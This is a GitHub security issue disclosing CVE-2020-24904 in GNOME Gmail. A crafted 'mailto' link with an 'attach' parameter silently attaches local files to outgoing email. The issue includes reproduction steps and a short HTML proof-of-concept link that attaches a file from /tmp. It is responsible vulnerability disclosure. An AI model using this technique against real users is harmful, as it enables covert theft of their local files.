Headline
CVE-2020-24904: Security issue · Issue #84 · davesteele/gnome-gmail
An issue was discovered in attach parameter in GNOME Gmail version 2.5.4, allows remote attackers to gain sensitive information via crafted “mailto” link.
Following the email conversation with David I am raising this security issue as agreed (or some might say a feature/expected behavior)
Summary
By using the “mailto?attach=…” parameter, a website can make GNOME Gmail attach local files to an email message without showing a warning to the user, additionally when user writes an email they can’t see that there is an attachment on some systems. Please see test.gif for a demonstration.
To summarize it is an analog of CVE-2020-11879 in GNOME Evolution KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail. https://twitter.com/jensvoid/status/1295357952480751616 Jens originally found this type of issue in email clients. As Jens wrote in the bugzilla report 613425 I quote: "This is arguable a dangerous feature because it allows an attacker to exfiltrate arbitrary files on disk (and also email from the victim’s IMAP account), if the victim sends an email based on attacker controlled mailto input and misses the attachment being added."
How to reproduce
- Have GNOME Gmail client installed on Ubuntu and choose GNOME GMail and Chrome as default browsers (I tested on Ubuntu 20.04 and 18.04.4 with latest stable Chrome)
- Copy Tux.png to /tmp directory
- Open test.html
- Click “Send email”
- In the GNOME Gmail fill the “To” and “Subject” fields
- Click send
test.html
<html>
<body>
<p>POC test</p>
<p><a href="mailto:[email protected]?attach=/tmp/Tux.png">Send email</a></p>
</body>
</html>
Tux.png https://en.wikipedia.org/wiki/File:Tux.png
Additional information
On Ubuntu 18.04.4 with Chrome version 83.0.4103.116 attachment isn’t shown, as you can see in demo above
On Ubuntu 20.04 with the latest stable Chrome attachment is shown